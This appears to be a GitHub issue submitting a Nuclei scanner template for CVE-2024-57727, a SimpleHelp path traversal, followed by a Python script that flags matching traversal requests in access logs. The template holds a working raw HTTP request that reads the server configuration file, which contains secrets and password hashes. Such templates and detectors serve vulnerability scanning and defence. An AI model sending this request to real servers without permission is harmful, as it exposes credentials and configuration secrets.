
Create CVE-2024-57727 #11504

Closed
@3th1cyuk1

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: CVE-2024-57727

info:
  name: SimpleHelp Path Traversal Vulnerability
  author: 3th1c_yuk1
  severity: high
  description: |
    SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57727
    - https://github.com/imjdl/CVE-2024-57727
    - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
    - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
    
http:
  - raw:
      - |
        GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "SimpleHelp Server XML Configuration File"
        condition: and

Relevant dumped responses

Anything else?

No response
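A defender-side check for the request shape this template sends, as an added example that is not part of the original issue or of the nuclei-templates project: it flags access-log entries whose `/toolbox-resource/` path normalizes to a location outside that prefix. It assumes combined-log-format access logs from a proxy in front of the SimpleHelp server; the function names and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PREFIX = "/toolbox-resource/"  # path prefix used by the template's request
# Request field of a combined-log-format line: "METHOD target HTTP/x.y" status
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [10/Feb/2025:10:00:01 +0000] "GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1" 200 5120',
    '198.51.100.4 - - [10/Feb/2025:10:00:02 +0000] "GET /toolbox-resource/icons/tool.png HTTP/1.1" 200 812',
    '198.51.100.4 - - [10/Feb/2025:10:00:03 +0000] "GET /toolbox-resource/a/../b.png HTTP/1.1" 200 640',
]

def decode_path(target, rounds=3):
    """Return the URL path with percent-encoding removed, repeating for nested encoding."""
    path = urlsplit(target).path
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def escapes_prefix(target):
    """True if a request under PREFIX resolves, after normalization, outside PREFIX."""
    path = decode_path(target)
    if not path.startswith(PREFIX):
        return False
    # Trailing slash so that the bare prefix directory itself is not flagged.
    return not (posixpath.normpath(path) + "/").startswith(PREFIX)

def scan(lines):
    """Return (target, status) for every log line whose path escapes PREFIX."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m and escapes_prefix(m.group("target")):
            hits.append((m.group("target"), int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for target, status in scan(SAMPLE_LOG):
        # A 200 means the server answered the escaping request, as the template's matcher expects.
        print(f"status={status} target={target}")
```

Hits with status 200 are the ones to review first, since the server configuration file holds secrets and hashed user passwords.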
